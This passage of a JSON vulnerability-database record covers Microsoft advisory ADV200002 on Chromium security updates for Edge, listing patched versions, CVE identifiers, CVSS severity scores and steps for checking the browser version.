[CVE-2020-6416](<https://vulners.com/cve/CVE-2020-6416>), [CVE-2020-6417](<https://vulners.com/cve/CVE-2020-6417>) \n79.0.309.68 | 1/17/2020 | 79.0.3945.130 | Critical | [CVE-2020-6378](<https://vulners.com/cve/CVE-2020-6378>), [CVE-2020-6379](<https://vulners.com/cve/CVE-2020-6379>), [CVE-2020-6380](<https://vulners.com/cve/CVE-2020-6380>), [CVE-2020-0601](<https://vulners.com/cve/CVE-2020-0601>) \n \n* CVE\u2019s in **bold** have been reported to be exploited in the wild.\n\n**How can I see the version of the browser?**\n\n 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window\n 2. Click on **Help and Feedback**\n 3. Click on **About Microsoft Edge**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-28T08:00:00", "type": "mscve", "title": "Chromium Security Updates for Microsoft Edge (Chromium-Based)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18197", "CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19925", "CVE-2019-19926", "CVE-2019-20503", "CVE-2019-8075", "CVE-2020-0601", "CVE-2020-1341", "CVE-2020-15959", "CVE-2020-15960", "CVE-2020-15961", "CVE-2020-15962", "CVE-2020-15963", "CVE-2020-15964", "CVE-2020-15965", "CVE-2020-15966", "CVE-2020-15968", "CVE-2020-15969", "CVE-2020-15971", "CVE-2020-15972", "CVE-2020-15973", "CVE-2020-15974", "CVE-2020-15975", "CVE-2020-15977", "CVE-2020-15979", "CVE-2020-15981", "CVE-2020-15982", "CVE-2020-15985", "CVE-2020-15987", "CVE-2020-15988", "CVE-2020-15989", "CVE-2020-15990", "CVE-2020-15991", "CVE-2020-15992", "CVE-2020-15995", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011", "CVE-2020-16012", "CVE-2020-16013", "CVE-2020-16014", "CVE-2020-16015", "CVE-2020-16016", "CVE-2020-16017", "CVE-2020-16018", "CVE-2020-16022", "CVE-2020-16023", "CVE-2020-16024", "CVE-2020-16025", "CVE-2020-16026", "CVE-2020-16027", "CVE-2020-16028", "CVE-2020-16029", "CVE-2020-16030", "CVE-2020-16031", "CVE-2020-16032", "CVE-2020-16033", "CVE-2020-16034", "CVE-2020-16036", "CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042", "CVE-2020-16043", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420", "CVE-2020-6422", "CVE-2020-6423", "CVE-2020-6424", "CVE-2020-6425", "CVE-2020-6426", "CVE-2020-6427", "CVE-2020-6428", "CVE-2020-6429", "CVE-2020-6430", "CVE-2020-6431", "CVE-2020-6432", "CVE-2020-6433", "CVE-2020-6434", "CVE-2020-6435", "CVE-2020-6436", "CVE-2020-6437", "CVE-2020-6438", "CVE-2020-6439", "CVE-2020-6440", "CVE-2020-6441", "CVE-2020-6442", "CVE-2020-6443", "CVE-2020-6444", "CVE-2020-6445", "CVE-2020-6446", "CVE-2020-6447", "CVE-2020-6448", "CVE-2020-6449", "CVE-2020-6450", "CVE-2020-6451", "CVE-2020-6452", "CVE-2020-6454", "CVE-2020-6455", "CVE-2020-6456", "CVE-2020-6457", "CVE-2020-6458", "CVE-2020-6459", "CVE-2020-6460", "CVE-2020-6461", "CVE-2020-6462", "CVE-2020-6464", "CVE-2020-6465", "CVE-2020-6466", "CVE-2020-6467", "CVE-2020-6468", "CVE-2020-6469", "CVE-2020-6470", "CVE-2020-6471", "CVE-2020-6472", "CVE-2020-6473", "CVE-2020-6474", "CVE-2020-6475", "CVE-2020-6476", "CVE-2020-6478", "CVE-2020-6479", "CVE-2020-6480", "CVE-2020-6481", "CVE-2020-6482", "CVE-2020-6483", "CVE-2020-6484", "CVE-2020-6486", "CVE-2020-6487", "CVE-2020-6488", "CVE-2020-6489", "CVE-2020-6490", "CVE-2020-6493", "CVE-2020-6494", "CVE-2020-6495", "CVE-2020-6496", "CVE-2020-6505", "CVE-2020-6506", "CVE-2020-6507", "CVE-2020-6509", "CVE-2020-6510", "CVE-2020-6511", "CVE-2020-6512", "CVE-2020-6513", "CVE-2020-6514", "CVE-2020-6515", "CVE-2020-6516", "CVE-2020-6517", "CVE-2020-6518", "CVE-2020-6519", "CVE-2020-6520", "CVE-2020-6521", "CVE-2020-6522", "CVE-2020-6523", "CVE-2020-6524", "CVE-2020-6525", "CVE-2020-6526", "CVE-2020-6527", "CVE-2020-6528", "CVE-2020-6529", "CVE-2020-6530", "CVE-2020-6531", "CVE-2020-6532", "CVE-2020-6533", "CVE-2020-6534", "CVE-2020-6535", "CVE-2020-6536", "CVE-2020-6537", "CVE-2020-6538", "CVE-2020-6539", "CVE-2020-6540", "CVE-2020-6541", "CVE-2020-6542", "CVE-2020-6543", "CVE-2020-6544", "CVE-2020-6545", "CVE-2020-6546", "CVE-2020-6547", "CVE-2020-6548", "CVE-2020-6549", "CVE-2020-6550", "CVE-2020-6551", "CVE-2020-6552", "CVE-2020-6553", "CVE-2020-6554", "CVE-2020-6555", "CVE-2020-6556", "CVE-2020-6557", "CVE-2020-6558", "CVE-2020-6559", "CVE-2020-6560", "CVE-2020-6561", "CVE-2020-6562", "CVE-2020-6563", "CVE-2020-6564", "CVE-2020-6566", "CVE-2020-6567", "CVE-2020-6568", "CVE-2020-6569", "CVE-2020-6570", "CVE-2020-6571", "CVE-2020-6574", "CVE-2020-6575", "CVE-2020-6576", "CVE-2020-6831", "CVE-2021-21106", "CVE-2021-21107", "CVE-2021-21108", "CVE-2021-21109", "CVE-2021-21110", "CVE-2021-21111", "CVE-2021-21112", "CVE-2021-21113", "CVE-2021-21114", "CVE-2021-21115", "CVE-2021-21116"], "modified": "2021-01-21T08:00:00", "id": "MS:ADV200002", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200002", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}